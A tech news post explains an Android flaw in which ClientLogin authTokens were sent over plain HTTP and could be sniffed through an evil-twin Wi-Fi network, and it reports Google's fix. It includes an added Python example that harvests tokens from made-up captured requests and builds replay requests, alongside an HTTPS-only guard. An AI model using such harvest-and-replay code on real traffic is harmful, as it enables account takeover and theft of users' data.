99% of Android Phones Vulnerable to Data Leak; Google Working on Quick Fix

Bad news for Android users and Google alike. Researchers in Germany have discovered a security flaw in Google’s Android OS. What’s more frightening is that 99 percent of Android users are affected, as the flaw hits anyone running any version of the OS lower than the most recent 2.3.4. Yup, that means anyone who doesn’t have an updated Nexus One or Nexus S. Sucks to be you bro.
The security flaw comes from a lack of a secure connection between Android and Google’s services. When a phone logs in for Calendar or Contacts, Google returns an authentication token (authToken), and the phone then sends that token in the clear, over plain HTTP, with every sync request. The token can be used for 14 days to access the user’s account, so anyone who sniffs it can impersonate the user for that long. This doesn’t affect Android 3.0 or 2.3.4, as they use HTTPS for Calendar and Contacts. Picasa, however, still syncs over plain HTTP, so those on Android 2.3.4 and above may still be affected to a lesser extent.
Researchers say that an attacker can easily capture these tokens from an Android phone by setting up a fake, “dummy” wireless network that a user’s phone will automatically try to connect to.
To collect such authTokens on a large scale an adversary could set up a wifi access point with a common SSID (evil twin) of an unencrypted wireless network, e.g., T-Mobile, attwifi, starbucks. With default settings, Android phones automatically connect to a previously known network and many apps will attempt syncing immediately. While syncing would fail (unless the adversary forwards the requests), the adversary would capture authTokens for each service that attempted syncing. Due to the long lifetime of authTokens, the adversary can comfortably capture a large number of tokens and make use of them later on from a different location.
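To make the attack above concrete, here is an added example (written for this post, not the researchers’ tooling or any Google code) of what a rogue access point ends up with and why the HTTPS change in 2.3.4 closes the hole. It assumes the ClientLogin header format `Authorization: GoogleLogin auth=<token>`, uses constructed sample requests with made-up token strings, treats the GData feed paths as illustrative labels for which service is syncing, and models the 14-day lifetime as a simple age check.

```python
"""Evil-twin authToken harvest, replay, and the client-side guard that prevents it.

Added illustration for this post. Sample traffic and token strings are constructed;
the feed-path-to-service mapping is illustrative, not a complete list.
"""
import re
from urllib.parse import urlsplit

TOKEN_LIFETIME_S = 14 * 24 * 3600  # 14-day authToken validity described above

# ClientLogin sends the token in this header on every request (assumed format).
AUTH_RE = re.compile(rb"^Authorization:\s*GoogleLogin\s+auth=(\S+)", re.I | re.M)
HOST_RE = re.compile(rb"^Host:\s*(\S+)", re.I | re.M)

# Which service a sync request belongs to, by feed path prefix (illustrative).
SERVICE_BY_PATH = {
    "/calendar/feeds/": "calendar",
    "/m8/feeds/": "contacts",
    "/data/feed/api/": "picasa",
}

# Constructed capture: two plaintext syncs as seen by the rogue AP. Nothing here
# is real traffic; the token values are made up.
CAPTURED_REQUESTS = [
    b"GET /calendar/feeds/default/owncalendars/full HTTP/1.1\r\n"
    b"Host: www.google.com\r\n"
    b"Authorization: GoogleLogin auth=DQAAAL4AAACtokenCALENDARexample\r\n"
    b"GData-Version: 2\r\n\r\n",
    b"GET /m8/feeds/contacts/default/full HTTP/1.1\r\n"
    b"Host: www.google.com\r\n"
    b"Authorization: GoogleLogin auth=DQAAAMAAAADtokenCONTACTSexample\r\n\r\n",
]


def parse_request(raw):
    """Return (host, path, token) for one captured HTTP request, or None if it
    carries no ClientLogin token."""
    request_line, _, headers = raw.partition(b"\r\n")
    parts = request_line.split()
    if len(parts) < 2:
        return None
    m_auth = AUTH_RE.search(headers)
    m_host = HOST_RE.search(headers)
    if not (m_auth and m_host):
        return None
    return m_host.group(1).decode(), parts[1].decode("ascii", "replace"), m_auth.group(1).decode()


def service_for(path):
    for prefix, name in SERVICE_BY_PATH.items():
        if path.startswith(prefix):
            return name
    return "unknown"


def harvest(requests, captured_at):
    """What the adversary keeps: one token per syncing service, plus when it was seen."""
    store = {}
    for raw in requests:
        parsed = parse_request(raw)
        if parsed is None:
            continue  # no token in this request (e.g. a failed TLS handshake)
        host, path, token = parsed
        store[service_for(path)] = {
            "host": host, "path": path, "token": token, "captured_at": captured_at,
        }
    return store


def replay_request(entry, now):
    """The request the adversary sends later from another network, or None once
    the token has aged past its 14-day lifetime."""
    if now - entry["captured_at"] > TOKEN_LIFETIME_S:
        return None
    return (
        f"GET {entry['path']} HTTP/1.1\r\nHost: {entry['host']}\r\n"
        f"Authorization: GoogleLogin auth={entry['token']}\r\n\r\n"
    ).encode()


def attach_token(url, token):
    """Client-side guard: a bearer-style token must only ever travel over TLS.
    This is the property Android 2.3.4 gets by moving Calendar/Contacts to HTTPS."""
    if urlsplit(url).scheme != "https":
        raise ValueError(f"refusing to send authToken over {url!r}: not HTTPS")
    return {"Authorization": f"GoogleLogin auth={token}"}


if __name__ == "__main__":
    loot = harvest(CAPTURED_REQUESTS, captured_at=0)
    for service, entry in loot.items():
        print(f"{service}: {entry['token']}")
    print(replay_request(loot["contacts"], now=3 * 86400).decode())
```

The point of the guard is that the token is equivalent to a password for two weeks, so the scheme check belongs in the client code that builds the request, not in whichever app happens to call it.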
Of course, Google has already acknowledged the issue and is able to implement a server-side fix that should patch things up for Calendar and Contacts on all Android versions, though Picasa is still a question mark.
Today we’re starting to roll out a fix which addresses a potential security flaw that could, under certain circumstances, allow a third party access to data available in calendar and contacts. This fix requires no action from users and will roll out globally over the next few days.
SOURCE via Computer World